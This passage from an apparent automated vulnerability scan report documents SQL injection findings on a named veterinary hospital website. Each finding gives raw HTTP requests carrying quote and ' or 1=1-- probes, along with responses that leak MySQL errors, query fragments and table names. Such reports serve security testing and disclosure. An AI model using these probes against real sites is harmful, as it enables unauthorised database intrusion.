The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 21204365'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main21204365'%20or%201%3d1--%20/offer/?=3&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:19:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=o6doohfgvipr3saul15roodh63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2261
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...
ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main21204365'%20or%201%3d1--%20'
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20'
                        limit 1' at line 31

1.11. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /main'/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 429

fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=h
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:22:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''
                        limit 1' at line 31

1.12. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer/thank-you.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /main'/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 448

fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:25:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='main''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''
                        limit 1' at line 31

Request 2

POST /main''/offer/thank-you.html? HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 448

fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35
...[SNIP]...

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:25:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 8205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...

1.13. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/manhattan-veterinary-group/appt.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /manhattan-veterinary-group'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2282
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...
oin ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='manhattan-veterinary-group''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''manhattan-veterinary-group''
                        limit 1' at line 31

Request 2

GET /manhattan-veterinary-group''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:46:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...

1.14. http://www.vcahospitals.com/marshfield [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/marshfield

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /marshfield' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2250
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='marshfield''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''marshfield''
                        limit 1' at line 31

Request 2

GET /marshfield'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:08 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

1.15. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/marshfield/appt.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /marshfield'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2250
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='marshfield''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''marshfield''
                        limit 1' at line 31

Request 2

GET /marshfield''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...

1.16. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /new-york-veterinary-hospital'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2286
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...
n ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='new-york-veterinary-hospital''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''new-york-veterinary-hospital''
                        limit 1' at line 31

Request 2

GET /new-york-veterinary-hospital''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:46:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...

1.17. http://www.vcahospitals.com/plymouth [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/plymouth

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /plymouth' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:03 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2246
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='plymouth''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth''
                        limit 1' at line 31

Request 2

GET /plymouth'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:05 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

1.18. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/plymouth/appt.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /plymouth'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:18 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2246
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,

...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id
                        where ims_Hospital.i_short_name='plymouth''
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth''
                        limit 1' at line 31

Request 2

GET /plymouth''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...

1.19. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/plymouth/more/boarding.html

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /plymouth'/more/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
